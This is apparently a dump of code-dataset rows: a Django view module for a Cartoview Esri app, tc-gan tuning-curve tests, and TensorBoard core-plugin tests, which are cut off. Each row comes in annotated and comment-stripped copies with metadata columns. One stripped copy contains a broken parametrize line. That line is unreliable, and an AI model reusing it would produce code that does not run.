        # Initial GET: render an unbound (empty) form.
        app_form = BasicAppForm(prefix='app_form')
    return render(request, NEW_EDIT_TPL, {'app_form': app_form})
def edit(request, resource_id):
    """Edit an existing app instance (same validation flow as ``new``).

    POST data is validated before saving; an invalid submission is
    re-rendered with its errors instead of letting ``ModelForm.save()``
    raise ``ValueError``.
    """
    basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
    if request.method == 'POST':
        app_form = BasicAppForm(request.POST, prefix='app_form',
                                instance=basic_app_obj)
        if app_form.is_valid():
            return save(request, app_form)
        # Invalid form: fall through and re-render it with error messages.
    else:
        # Initial GET: render the form pre-filled from the existing instance.
        app_form = BasicAppForm(prefix='app_form', instance=basic_app_obj)
    return render(request, NEW_EDIT_TPL, {'app_form': app_form})
# ------------- Utility functions to handle json comments -------------
# Matches // line comments and /* ... */ block comments, together with any
# surrounding non-newline whitespace.
comment_re = re.compile(
    '(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
    re.DOTALL | re.MULTILINE
)
# Substrings that legitimately contain "//"; they are swapped for placeholders
# so the comment regex cannot mangle them.
comments_exception = {'http://': 'HTTP_PLACE_HOLDER', 'https://': 'HTTPS_PLACE_HOLDER',
                      'location.protocol + "//': 'LOCATION_PLACE_HOLDER'}


def remove_json_comments(json_string):
    """Strip ``//`` and ``/* */`` comments from *json_string*.

    URL-like substrings (see ``comments_exception``) are shielded with
    placeholders before comment removal and restored afterwards, so a value
    such as ``"http://example.com"`` survives intact.  Returns the cleaned
    string (still a string; the caller parses it with ``json``).
    """
    text = json_string
    # Shield substrings that legitimately contain slashes.
    for literal, placeholder in comments_exception.items():
        text = text.replace(literal, placeholder)
    # Repeatedly delete the first remaining comment until none are left.
    found = comment_re.search(text)
    while found:
        text = text[:found.start()] + text[found.end():]
        found = comment_re.search(text)
    # Restore the shielded substrings.
    for literal, placeholder in comments_exception.items():
        text = text.replace(placeholder, literal)
    return text
| 31.264151 | 106 | 0.673808 | import json
import re
from string import rstrip
from urlparse import urljoin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from cartoview.app_manager.models import *
from forms import BasicAppForm
from geonode import settings
from .models import *
APP_NAME = 'cartoview_esri_app_starter'
VIEW_TPL = "%s/index.html" % APP_NAME
NEW_EDIT_TPL = "%s/new.html" % APP_NAME
def view(request, resource_id):
basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
config_json = json.loads(remove_json_comments(basic_app_obj.config))
config_json['webmap'] = str(basic_app_obj.web_map_id)
config_json['title'] = basic_app_obj.title
config_json['description'] = basic_app_obj.abstract
config_json['sharinghost'] = rstrip(str(urljoin(settings.SITEURL, reverse("arcportal_home"))), '/')
context = {'config_json': json.dumps(config_json)}
return render(request, VIEW_TPL, context)
def save(request, app_form):
basic_app_obj = app_form.save(commit=False)
basic_app_obj.app = App.objects.get(name=APP_NAME)
basic_app_obj.owner = request.user
basic_app_obj.save()
return HttpResponseRedirect(reverse('appinstance_detail', kwargs={'appinstanceid': basic_app_obj.pk}))
def new(request):
if request.method == 'POST':
app_form = BasicAppForm(request.POST, prefix='app_form')
return save(request, app_form)
else:
context = {'app_form': BasicAppForm(prefix='app_form')}
return render(request, NEW_EDIT_TPL, context)
def edit(request, resource_id):
basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
if request.method == 'POST':
app_form = BasicAppForm(request.POST, prefix='app_form', instance=basic_app_obj)
return save(request, app_form)
else:
context = {'app_form': BasicAppForm(prefix='app_form', instance=basic_app_obj)}
return render(request, NEW_EDIT_TPL, context)
comment_re = re.compile(
'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE
)
comments_exception = {'http://': 'HTTP_PLACE_HOLDER', 'https://': 'HTTPS_PLACE_HOLDER',
'location.protocol + "//': 'LOCATION_PLACE_HOLDER'}
def remove_json_comments(json_string):
content = json_string # ''.join(json_string)
for key in comments_exception:
content = content.replace(key, comments_exception[key])
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
for key in comments_exception:
content = content.replace(comments_exception[key], key)
# Return json
return content
| true | true |
f72316a939081794a0a3bc72714dad3bdabb1b10 | 2,878 | py | Python | tc_gan/networks/tests/test_tuning_curve.py | ahmadianlab/tc-gan | 06c549e8ae74bc6af62fddeed698565ea1f548c5 | [
"MIT"
] | 4 | 2019-06-04T08:15:43.000Z | 2020-10-03T13:59:15.000Z | tc_gan/networks/tests/test_tuning_curve.py | ahmadianlab/tc-gan | 06c549e8ae74bc6af62fddeed698565ea1f548c5 | [
"MIT"
] | null | null | null | tc_gan/networks/tests/test_tuning_curve.py | ahmadianlab/tc-gan | 06c549e8ae74bc6af62fddeed698565ea1f548c5 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from ...core import consume_config
from ..cwgan import ConditionalTuningCurveGenerator
from ..ssn import emit_tuning_curve_generator, ssn_type_choices
from ..wgan import DEFAULT_PARAMS
from .test_euler_ssn import JDS
# Shared keyword arguments for building small, fast tuning-curve generators in
# the tests below.  Starts from DEFAULT_PARAMS and overrides the network size
# and simulation length so each test runs quickly.
TEST_PARAMS = dict(
    DEFAULT_PARAMS,
    # Stimulator:
    num_tcdom=10,
    num_sites=50,
    # Model / SSN:
    tau_E=2,
    dt=0.1,
    seqlen=240,
    skip_steps=200,
    # Prober:
    probes=[0],
    **JDS  # Model / SSN
)
# These keys are either irrelevant here or supplied per-test, so drop them
# from the shared defaults.
del TEST_PARAMS['bandwidths']
del TEST_PARAMS['contrasts']
del TEST_PARAMS['sample_sites']
del TEST_PARAMS['gen']
del TEST_PARAMS['disc']
def emit_tcg_for_test(**kwargs):
    """Emit a tuning-curve generator from TEST_PARAMS overridden by *kwargs*."""
    merged = dict(TEST_PARAMS)
    merged.update(kwargs)
    return emit_tuning_curve_generator(**merged)
def tcg_for_test(config=None, **kwargs):
    """Build a tuning-curve generator for tests.

    ``config`` defaults to an empty dict (the original used a mutable default
    argument, which is shared across calls).  Asserts that ``consume_config``
    consumed every entry of ``config``, then returns the generator.
    """
    if config is None:
        config = {}
    tcg, rest = consume_config(emit_tcg_for_test, config, **kwargs)
    assert not rest
    return tcg
def get_param_values(self):
    """Return a dict mapping each parameter's name to its current value."""
    return {param.name: param.get_value() for param in self.get_all_params()}
@pytest.mark.parametrize('ssn_type, params', [
    ('default', {}),
    # dict(J=0.5),  # unsupported (should I?)
    ('default', dict(J=[[1, 2], [3, 4]])),
    ('default', dict(J=np.array([[1, 2], [3, 4]], dtype=int))),
    ('default', dict(J=np.array([[1, 2], [3, 4]], dtype='float32'))),
    ('heteroin', dict(V=[0.3, 0])),
    ('deg-heteroin', dict(V=0.5)),
])
def test_tcg_set_params(ssn_type, params):
    """set_params stores the given values without mutating its argument."""
    tcg = tcg_for_test(dict(ssn_type=ssn_type))
    expected_keys = set(params)
    tcg.set_params(params)
    assert expected_keys == set(params)  # set_params must not modify params
    actual = get_param_values(tcg)
    # Compare each parameter with np.allclose (instead of
    # np.testing.assert_equal) since params[k] may be broadcast to array.
    matches = {key: np.allclose(actual[key], params[key])
               for key in expected_keys}
    assert all(matches.values())
def test_tcg_set_unknown_params():
    """Passing a parameter name the SSN does not define raises ValueError."""
    tcg = tcg_for_test()
    with pytest.raises(ValueError) as excinfo:
        tcg.set_params(dict(V=[0.3, 0]))
    error_text = str(excinfo.value)
    assert 'Unknown parameters:' in error_text
# Expected ordering of flattened parameter names, per SSN type.  The 'default'
# type exposes the J/D/S 2x2 connection matrices in row-major (E-then-I) order.
flat_param_names = {
    'default': [
        'J_EE', 'J_EI',
        'J_IE', 'J_II',
        'D_EE', 'D_EI',
        'D_IE', 'D_II',
        'S_EE', 'S_EI',
        'S_IE', 'S_II',
    ],
}
# Heterogeneous-input variants prepend their V parameters to the default list.
flat_param_names['heteroin'] = ['V_E', 'V_I'] + flat_param_names['default']
flat_param_names['deg-heteroin'] = ['V'] + flat_param_names['default']
@pytest.mark.parametrize('ssn_type', ssn_type_choices)
@pytest.mark.parametrize('conditional', [False, True])
def test_tcg_flat_param_names(ssn_type, conditional):
    """Generators report the flat parameter names expected for their SSN type."""
    config = {}
    if conditional:
        config['emit_tcg'] = ConditionalTuningCurveGenerator.consume_kwargs
    tcg = tcg_for_test(config, ssn_type=ssn_type)
    expected = tuple(flat_param_names[ssn_type])
    assert tcg.get_flat_param_names() == expected
| 27.409524 | 75 | 0.652884 | import numpy as np
import pytest
from ...core import consume_config
from ..cwgan import ConditionalTuningCurveGenerator
from ..ssn import emit_tuning_curve_generator, ssn_type_choices
from ..wgan import DEFAULT_PARAMS
from .test_euler_ssn import JDS
TEST_PARAMS = dict(
DEFAULT_PARAMS,
num_tcdom=10,
num_sites=50,
tau_E=2,
dt=0.1,
seqlen=240,
skip_steps=200,
probes=[0],
**JDS
)
del TEST_PARAMS['bandwidths']
del TEST_PARAMS['contrasts']
del TEST_PARAMS['sample_sites']
del TEST_PARAMS['gen']
del TEST_PARAMS['disc']
def emit_tcg_for_test(**kwargs):
return emit_tuning_curve_generator(**dict(TEST_PARAMS, **kwargs))
def tcg_for_test(config={}, **kwargs):
tcg, rest = consume_config(emit_tcg_for_test, config, **kwargs)
assert not rest
return tcg
def get_param_values(self):
values = {}
for p in self.get_all_params():
values[p.name] = p.get_value()
return values
@pytest.mark.parametrize('ssn_type, params', [
('default', {}),
[1, 2], [3, 4]])),
('default', dict(J=np.array([[1, 2], [3, 4]], dtype=int))),
('default', dict(J=np.array([[1, 2], [3, 4]], dtype='float32'))),
('heteroin', dict(V=[0.3, 0])),
('deg-heteroin', dict(V=0.5)),
])
def test_tcg_set_params(ssn_type, params):
config = dict(ssn_type=ssn_type)
tcg = tcg_for_test(config)
keys = set(params)
tcg.set_params(params)
assert keys == set(params)
actual = get_param_values(tcg)
test = {}
for k in keys:
test[k] = np.allclose(actual[k], params[k])
assert all(test.values())
def test_tcg_set_unknown_params():
tcg = tcg_for_test()
with pytest.raises(ValueError) as excinfo:
tcg.set_params(dict(V=[0.3, 0]))
assert 'Unknown parameters:' in str(excinfo.value)
flat_param_names = {
'default': [
'J_EE', 'J_EI',
'J_IE', 'J_II',
'D_EE', 'D_EI',
'D_IE', 'D_II',
'S_EE', 'S_EI',
'S_IE', 'S_II',
],
}
flat_param_names['heteroin'] = ['V_E', 'V_I'] + flat_param_names['default']
flat_param_names['deg-heteroin'] = ['V'] + flat_param_names['default']
@pytest.mark.parametrize('ssn_type', ssn_type_choices)
@pytest.mark.parametrize('conditional', [False, True])
def test_tcg_flat_param_names(ssn_type, conditional):
desired_names = tuple(flat_param_names[ssn_type])
config = {}
if conditional:
config['emit_tcg'] = ConditionalTuningCurveGenerator.consume_kwargs
tcg = tcg_for_test(config, ssn_type=ssn_type)
assert tcg.get_flat_param_names() == desired_names
| true | true |
f7231a116ed9f09ae68969561b1b23aa5374e682 | 14,609 | py | Python | tensorboard/plugins/core/core_plugin_test.py | manivaradarajan/tensorboard | c1c7cbd665b1da025f9b23adae8ba41d2890d424 | [
"Apache-2.0"
] | 1 | 2017-08-28T08:12:14.000Z | 2017-08-28T08:12:14.000Z | tensorboard/plugins/core/core_plugin_test.py | lanpa/tensorboard | 6ba7155a614cf1cfab97f8ec7c561adb0a609b0d | [
"Apache-2.0"
] | 16 | 2017-08-31T05:13:08.000Z | 2020-07-09T03:22:14.000Z | tensorboard/plugins/core/core_plugin_test.py | lanpa/tensorboard | 6ba7155a614cf1cfab97f8ec7c561adb0a609b0d | [
"Apache-2.0"
] | 1 | 2020-08-03T20:21:35.000Z | 2020-08-03T20:21:35.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests the TensorBoard core endpoints."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections.abc
import contextlib
import json
import os
import six
import zipfile
try:
# python version >= 3.3
from unittest import mock
except ImportError:
import mock # pylint: disable=unused-import
import tensorflow as tf
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from tensorboard.backend import application
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.data import provider
from tensorboard.plugins import base_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.util import test_util
FAKE_INDEX_HTML = b"<!doctype html><title>fake-index</title>"
class FakeFlags(object):
    """Lightweight stand-in for TensorBoard's parsed command-line flags.

    Every keyword argument is mirrored onto an attribute of the same name so
    instances can be handed to code expecting the real flags namespace.
    """

    def __init__(
        self,
        bind_all=False,
        host=None,
        inspect=False,
        version_tb=False,
        logdir="",
        logdir_spec="",
        event_file="",
        db="",
        path_prefix="",
        generic_data="true",
    ):
        # Copy every argument (except self) onto an identically named attribute.
        arguments = dict(locals())
        del arguments["self"]
        self.__dict__.update(arguments)
class CorePluginFlagsTest(tf.test.TestCase):
    """Validation behavior of CorePluginLoader.fix_flags."""

    def testFlag(self):
        loader = core_plugin.CorePluginLoader()
        # All of these flag combinations are legal and must not raise.
        loader.fix_flags(FakeFlags(version_tb=True))
        loader.fix_flags(FakeFlags(inspect=True, logdir="/tmp"))
        loader.fix_flags(FakeFlags(inspect=True, event_file="/tmp/event.out"))
        loader.fix_flags(FakeFlags(inspect=False, logdir="/tmp"))
        loader.fix_flags(FakeFlags(inspect=False, db="sqlite:foo"))
        # User can pass both, although the behavior is not clearly defined.
        loader.fix_flags(
            FakeFlags(inspect=False, logdir="/tmp", db="sqlite:foo")
        )

        need_logdir_or_db = r"A logdir or db must be specified"
        need_exactly_one = r"Must specify either --logdir.*but not both.$"
        need_either = r"Must specify either --logdir or --event_file.$"
        with six.assertRaisesRegex(self, ValueError, need_either):
            loader.fix_flags(FakeFlags(inspect=True))
        with six.assertRaisesRegex(self, ValueError, need_exactly_one):
            loader.fix_flags(
                FakeFlags(
                    inspect=True, logdir="/tmp", event_file="/tmp/event.out"
                )
            )
        with six.assertRaisesRegex(self, ValueError, need_logdir_or_db):
            loader.fix_flags(FakeFlags(inspect=False))
        with six.assertRaisesRegex(self, ValueError, need_logdir_or_db):
            loader.fix_flags(
                FakeFlags(inspect=False, event_file="/tmp/event.out")
            )

    def testPathPrefix_stripsTrailingSlashes(self):
        """Any number of trailing slashes is normalized away."""
        loader = core_plugin.CorePluginLoader()
        for raw_prefix in ("/hello", "/hello/", "/hello//", "/hello///"):
            flags = FakeFlags(
                inspect=False, logdir="/tmp", path_prefix=raw_prefix
            )
            loader.fix_flags(flags)
            self.assertEqual(
                flags.path_prefix,
                "/hello",
                "got %r (input %r)" % (flags.path_prefix, raw_prefix),
            )

    def testPathPrefix_mustStartWithSlash(self):
        """A path prefix lacking a leading slash is rejected with FlagsError."""
        loader = core_plugin.CorePluginLoader()
        flags = FakeFlags(inspect=False, logdir="/tmp", path_prefix="noslash")
        with self.assertRaises(base_plugin.FlagsError) as cm:
            loader.fix_flags(flags)
        message = str(cm.exception)
        self.assertIn("must start with slash", message)
        self.assertIn(repr("noslash"), message)
class CorePluginNoDataTest(tf.test.TestCase):
    """CorePlugin route behavior against an empty (no-event) logdir."""

    def setUp(self):
        super(CorePluginNoDataTest, self).setUp()
        # Serve the plugin through a fake WSGI client; no event files exist.
        context = base_plugin.TBContext(
            assets_zip_provider=get_test_assets_zip_provider(),
            logdir=self.get_temp_dir(),
            multiplexer=event_multiplexer.EventMultiplexer(),
            window_title="title foo",
        )
        self.plugin = core_plugin.CorePlugin(context)
        wsgi_app = application.TensorBoardWSGI([self.plugin])
        self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)

    def _get_json(self, server, path):
        """GET *path*, assert a JSON 200 response, and decode the body."""
        reply = server.get(path)
        self.assertEqual(200, reply.status_code)
        self.assertEqual(
            "application/json", reply.headers.get("Content-Type")
        )
        return json.loads(reply.get_data().decode("utf-8"))

    def testRoutesProvided(self):
        """The plugin must expose the /data/logdir and /data/runs routes."""
        routes = self.plugin.get_plugin_apps()
        for route in ("/data/logdir", "/data/runs"):
            self.assertIsInstance(routes[route], collections.abc.Callable)

    def testIndex_returnsActualHtml(self):
        """The root endpoint serves the bundled index.html verbatim."""
        reply = self.server.get("/")
        self.assertEqual(200, reply.status_code)
        self.assertStartsWith(reply.headers.get("Content-Type"), "text/html")
        self.assertEqual(reply.get_data(), FAKE_INDEX_HTML)

    def testDataPaths_disableAllCaching(self):
        """Data endpoints must set "Expires: 0" to defeat browser caching."""
        for path in ("/data/runs", "/data/logdir"):
            reply = self.server.get(path)
            self.assertEqual(200, reply.status_code, msg=path)
            self.assertEqual("0", reply.headers.get("Expires"), msg=path)

    def testEnvironmentForWindowTitle(self):
        """/data/environment reports the configured window title."""
        environment = self._get_json(self.server, "/data/environment")
        self.assertEqual(environment["window_title"], "title foo")

    def testEnvironmentForLogdir(self):
        """/data/environment reports the logdir as the data location."""
        environment = self._get_json(self.server, "/data/environment")
        self.assertEqual(environment["data_location"], self.get_temp_dir())

    def testLogdir(self):
        """/data/logdir returns {"logdir": <logdir>}."""
        payload = self._get_json(self.server, "/data/logdir")
        self.assertEqual(payload, {"logdir": self.get_temp_dir()})
class CorePluginExperimentMetadataTest(tf.test.TestCase):
    """Checks /data/environment against a data provider's experiment metadata."""

    def _get_json(self, server, path):
        """GET *path*, assert a JSON 200 response, and decode the body."""
        reply = server.get(path)
        self.assertEqual(200, reply.status_code)
        self.assertEqual(
            "application/json", reply.headers.get("Content-Type")
        )
        return json.loads(reply.get_data().decode("utf-8"))

    def testGetEnvironmentDataWithExperimentMetadata(self):
        """Metadata fields are surfaced when the provider supplies them."""

        class FakeDataProvider(object):
            def data_location(self, ctx, *, experiment_id):
                del experiment_id  # Unused.
                return ""

            def experiment_metadata(self, ctx, *, experiment_id):
                del experiment_id  # Unused.
                return provider.ExperimentMetadata(
                    experiment_name="Experiment #5 (実験#5)",
                    experiment_description="Take five (😊)",
                    creation_time=1234.5,
                )

        self.context = base_plugin.TBContext(
            flags=FakeFlags(generic_data="true"),
            data_provider=FakeDataProvider(),
        )
        self.plugin = core_plugin.CorePlugin(self.context)
        wsgi_app = application.TensorBoardWSGI([self.plugin])
        self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)

        environment = self._get_json(self.server, "/data/environment")
        self.assertEqual(environment["data_location"], "")
        self.assertEqual(environment["window_title"], None)
        self.assertEqual(
            environment["experiment_name"], "Experiment #5 (実験#5)"
        )
        self.assertEqual(
            environment["experiment_description"], "Take five (😊)"
        )
        self.assertEqual(environment["creation_time"], 1234.5)

    def testGetEnvironmentDataWithNoExperimentMetadata(self):
        """Metadata keys are omitted entirely when the provider returns None."""

        class FakeDataProvider(object):
            def data_location(self, ctx, *, experiment_id):
                del experiment_id  # Unused.
                return ""

            def experiment_metadata(self, ctx, *, experiment_id):
                del experiment_id  # Unused.
                return None

        self.context = base_plugin.TBContext(
            flags=FakeFlags(generic_data="true"),
            data_provider=FakeDataProvider(),
        )
        self.plugin = core_plugin.CorePlugin(self.context)
        wsgi_app = application.TensorBoardWSGI([self.plugin])
        self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)

        environment = self._get_json(self.server, "/data/environment")
        self.assertEqual(environment["data_location"], "")
        self.assertEqual(environment["window_title"], None)
        self.assertNotIn("experiment_name", environment)
        self.assertNotIn("experiment_description", environment)
        self.assertNotIn("creation_time", environment)
class CorePluginTestBase(object):
    """Shared fixture and run-listing tests for CorePlugin with real event data.

    Subclassed alongside tf.test.TestCase (note ``super().setUp()`` and the
    ``assert*`` methods, which only exist on the mixed-in test case).
    """

    def setUp(self):
        super(CorePluginTestBase, self).setUp()
        # Real multiplexer over a temp logdir; runs are added via _add_run.
        self.logdir = self.get_temp_dir()
        self.multiplexer = event_multiplexer.EventMultiplexer()
        context = base_plugin.TBContext(
            assets_zip_provider=get_test_assets_zip_provider(),
            logdir=self.logdir,
            multiplexer=self.multiplexer,
        )
        self.plugin = core_plugin.CorePlugin(context)
        app = application.TensorBoardWSGI([self.plugin])
        self.server = werkzeug_test.Client(app, wrappers.BaseResponse)

    def create_multiplexer(self):
        # Abstract hook; concrete subclasses supply a multiplexer.
        raise NotImplementedError()

    def _add_run(self, run_name):
        """Write one summary under ``logdir/run_name`` and reload the multiplexer."""
        run_path = os.path.join(self.logdir, run_name)
        with test_util.FileWriter(run_path) as writer:
            writer.add_test_summary("foo")
        self.multiplexer.AddRunsFromDirectory(self.logdir)
        self.multiplexer.Reload()

    def _get_json(self, server, path):
        """GET *path*, assert a JSON 200 response, and decode the body."""
        response = server.get(path)
        self.assertEqual(200, response.status_code)
        self.assertEqual(
            "application/json", response.headers.get("Content-Type")
        )
        return json.loads(response.get_data().decode("utf-8"))

    def testRuns(self):
        """Test the format of the /data/runs endpoint."""
        self._add_run("run1")
        run_json = self._get_json(self.server, "/data/runs")
        self.assertEqual(run_json, ["run1"])

    def testRunsAppendOnly(self):
        """Test that new runs appear after old ones in /data/runs."""
        # Fake first-event times per run; None means "no timestamp available".
        fake_wall_times = {
            "run1": 1234.0,
            "avocado": 2345.0,
            "zebra": 3456.0,
            "ox": 4567.0,
            "mysterious": None,
            "enigmatic": None,
        }

        def FirstEventTimestamp_stub(run_name):
            # Match the (path-suffixed) run name against the table above.
            matches = [
                candidate_name
                for candidate_name in fake_wall_times
                if run_name.endswith(candidate_name)
            ]
            self.assertEqual(len(matches), 1, "%s (%s)" % (matches, run_name))
            wall_time = fake_wall_times[matches[0]]
            if wall_time is None:
                raise ValueError("No event timestamp could be found")
            else:
                return wall_time

        with mock.patch.object(
            self.multiplexer, "FirstEventTimestamp"
        ) as mock_first_event_timestamp:
            mock_first_event_timestamp.side_effect = FirstEventTimestamp_stub
            # Start with a single run.
            self._add_run("run1")
            # Add one run: it should come last.
            self._add_run("avocado")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"), ["run1", "avocado"],
            )
            # Add another run: it should come last, too.
            self._add_run("zebra")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra"],
            )
            # And maybe there's a run for which we somehow have no timestamp.
            self._add_run("mysterious")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra", "mysterious"],
            )
            # Add another timestamped run: it should come before the timestamp-less one.
            self._add_run("ox")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra", "ox", "mysterious"],
            )
            # Add another timestamp-less run, lexicographically before the other one:
            # it should come after all timestamped runs but first among timestamp-less.
            self._add_run("enigmatic")
            self.assertEqual(
                self._get_json(self.server, "/data/runs"),
                ["run1", "avocado", "zebra", "ox", "enigmatic", "mysterious"],
            )
def get_test_assets_zip_provider():
    """Return a callable yielding a fresh zip stream containing FAKE_INDEX_HTML.

    The archive is built once; each invocation of the returned callable hands
    back a new closing BytesIO over the same bytes.
    """
    buffer = six.BytesIO()
    archive = zipfile.ZipFile(buffer, mode="w", compression=zipfile.ZIP_DEFLATED)
    archive.writestr("index.html", FAKE_INDEX_HTML)
    archive.close()
    payload = buffer.getvalue()

    def provider_fn():
        return contextlib.closing(six.BytesIO(payload))

    return provider_fn
if __name__ == "__main__":
    # Run all test cases in this module via the TensorFlow test runner.
    tf.test.main()
| 37.945455 | 88 | 0.628517 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections.abc
import contextlib
import json
import os
import six
import zipfile
try:
from unittest import mock
except ImportError:
import mock
import tensorflow as tf
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from tensorboard.backend import application
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.data import provider
from tensorboard.plugins import base_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.util import test_util
FAKE_INDEX_HTML = b"<!doctype html><title>fake-index</title>"
class FakeFlags(object):
def __init__(
self,
bind_all=False,
host=None,
inspect=False,
version_tb=False,
logdir="",
logdir_spec="",
event_file="",
db="",
path_prefix="",
generic_data="true",
):
self.bind_all = bind_all
self.host = host
self.inspect = inspect
self.version_tb = version_tb
self.logdir = logdir
self.logdir_spec = logdir_spec
self.event_file = event_file
self.db = db
self.path_prefix = path_prefix
self.generic_data = generic_data
class CorePluginFlagsTest(tf.test.TestCase):
def testFlag(self):
loader = core_plugin.CorePluginLoader()
loader.fix_flags(FakeFlags(version_tb=True))
loader.fix_flags(FakeFlags(inspect=True, logdir="/tmp"))
loader.fix_flags(FakeFlags(inspect=True, event_file="/tmp/event.out"))
loader.fix_flags(FakeFlags(inspect=False, logdir="/tmp"))
loader.fix_flags(FakeFlags(inspect=False, db="sqlite:foo"))
loader.fix_flags(
FakeFlags(inspect=False, logdir="/tmp", db="sqlite:foo")
)
logdir_or_db_req = r"A logdir or db must be specified"
one_of_event_or_logdir_req = (
r"Must specify either --logdir.*but not both.$"
)
event_or_logdir_req = r"Must specify either --logdir or --event_file.$"
with six.assertRaisesRegex(self, ValueError, event_or_logdir_req):
loader.fix_flags(FakeFlags(inspect=True))
with six.assertRaisesRegex(
self, ValueError, one_of_event_or_logdir_req
):
loader.fix_flags(
FakeFlags(
inspect=True, logdir="/tmp", event_file="/tmp/event.out"
)
)
with six.assertRaisesRegex(self, ValueError, logdir_or_db_req):
loader.fix_flags(FakeFlags(inspect=False))
with six.assertRaisesRegex(self, ValueError, logdir_or_db_req):
loader.fix_flags(
FakeFlags(inspect=False, event_file="/tmp/event.out")
)
def testPathPrefix_stripsTrailingSlashes(self):
loader = core_plugin.CorePluginLoader()
for path_prefix in ("/hello", "/hello/", "/hello//", "/hello///"):
flag = FakeFlags(
inspect=False, logdir="/tmp", path_prefix=path_prefix
)
loader.fix_flags(flag)
self.assertEqual(
flag.path_prefix,
"/hello",
"got %r (input %r)" % (flag.path_prefix, path_prefix),
)
def testPathPrefix_mustStartWithSlash(self):
loader = core_plugin.CorePluginLoader()
flag = FakeFlags(inspect=False, logdir="/tmp", path_prefix="noslash")
with self.assertRaises(base_plugin.FlagsError) as cm:
loader.fix_flags(flag)
msg = str(cm.exception)
self.assertIn("must start with slash", msg)
self.assertIn(repr("noslash"), msg)
class CorePluginNoDataTest(tf.test.TestCase):
def setUp(self):
super(CorePluginNoDataTest, self).setUp()
context = base_plugin.TBContext(
assets_zip_provider=get_test_assets_zip_provider(),
logdir=self.get_temp_dir(),
multiplexer=event_multiplexer.EventMultiplexer(),
window_title="title foo",
)
self.plugin = core_plugin.CorePlugin(context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testRoutesProvided(self):
routes = self.plugin.get_plugin_apps()
self.assertIsInstance(routes["/data/logdir"], collections.abc.Callable)
self.assertIsInstance(routes["/data/runs"], collections.abc.Callable)
def testIndex_returnsActualHtml(self):
response = self.server.get("/")
self.assertEqual(200, response.status_code)
self.assertStartsWith(response.headers.get("Content-Type"), "text/html")
html = response.get_data()
self.assertEqual(html, FAKE_INDEX_HTML)
def testDataPaths_disableAllCaching(self):
for path in ("/data/runs", "/data/logdir"):
response = self.server.get(path)
self.assertEqual(200, response.status_code, msg=path)
self.assertEqual("0", response.headers.get("Expires"), msg=path)
def testEnvironmentForWindowTitle(self):
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["window_title"], "title foo")
def testEnvironmentForLogdir(self):
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], self.get_temp_dir())
def testLogdir(self):
parsed_object = self._get_json(self.server, "/data/logdir")
self.assertEqual(parsed_object, {"logdir": self.get_temp_dir()})
class CorePluginExperimentMetadataTest(tf.test.TestCase):
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testGetEnvironmentDataWithExperimentMetadata(self):
class FakeDataProvider(object):
def data_location(self, ctx, *, experiment_id):
del experiment_id
return ""
def experiment_metadata(self, ctx, *, experiment_id):
del experiment_id
return provider.ExperimentMetadata(
experiment_name="Experiment #5 (実験#5)",
experiment_description="Take five (😊)",
creation_time=1234.5,
)
self.context = base_plugin.TBContext(
flags=FakeFlags(generic_data="true"),
data_provider=FakeDataProvider(),
)
self.plugin = core_plugin.CorePlugin(self.context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], "")
self.assertEqual(parsed_object["window_title"], None)
self.assertEqual(
parsed_object["experiment_name"], "Experiment #5 (実験#5)"
)
self.assertEqual(
parsed_object["experiment_description"], "Take five (😊)"
)
self.assertEqual(parsed_object["creation_time"], 1234.5)
def testGetEnvironmentDataWithNoExperimentMetadata(self):
class FakeDataProvider(object):
def data_location(self, ctx, *, experiment_id):
del experiment_id
return ""
def experiment_metadata(self, ctx, *, experiment_id):
del experiment_id
return None
self.context = base_plugin.TBContext(
flags=FakeFlags(generic_data="true"),
data_provider=FakeDataProvider(),
)
self.plugin = core_plugin.CorePlugin(self.context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
